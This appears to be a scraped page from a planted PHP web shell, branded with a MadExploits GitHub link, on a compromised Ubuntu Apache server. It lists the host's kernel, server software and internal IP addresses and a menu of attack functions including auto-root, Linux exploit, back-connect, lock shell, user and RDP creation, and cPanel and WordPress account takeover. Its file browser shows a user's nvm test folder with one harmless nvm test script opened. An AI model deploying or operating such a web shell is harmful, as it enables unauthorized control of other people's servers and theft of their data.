Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
slow /
nvm run /
[ HOME SHELL ]
Name
Size
Permission
Action
Running 'nvm run --harmony --v...
258
B
-rwxr-xr-x
Running 'nvm run --lts' should...
579
B
-rwxr-xr-x
Running 'nvm run 0.x' should e...
602
B
-rwxr-xr-x
Running 'nvm run 0.x' should w...
180
B
-rwxr-xr-x
Running 'nvm run' should pick ...
917
B
-rwxr-xr-x
setup_dir
144
B
-rwxr-xr-x
teardown_dir
181
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Running 'nvm run' should pick up .nvmrc version
#!/bin/sh die () { echo "$@" ; exit 1; } \. ../../../nvm.sh echo "0.10.7" > .nvmrc [ "$(nvm run --version | tail -1)" = "v0.10.7" ] || die "\`nvm run\` failed to run with the .nvmrc version" [ "$(nvm run --version | head -1)" = "Found '$PWD/.nvmrc' with version <0.10.7>" ] || die "\`nvm run\` failed to print out the \"found in .nvmrc\" message" echo "foo" > .nvmrc # running nvm run with .nvmrc should not print the version information when not installed OUTPUT="$(nvm run --version 2>&1)" EXIT_CODE=$? EXPECTED_OUTPUT="Found '$PWD/.nvmrc' with version <foo> N/A: version \"foo\" is not yet installed. You need to run \`nvm install\` to install and use the node version specified in \`.nvmrc\`." [ "_$OUTPUT" = "_$EXPECTED_OUTPUT" ] || die "expected 'nvm use' with nvmrc to give $EXPECTED_OUTPUT, got $OUTPUT" [ "_$EXIT_CODE" = "_1" ] || die "expected 'nvm use' with nvmrc to exit with 1, got $EXIT_CODE"
Close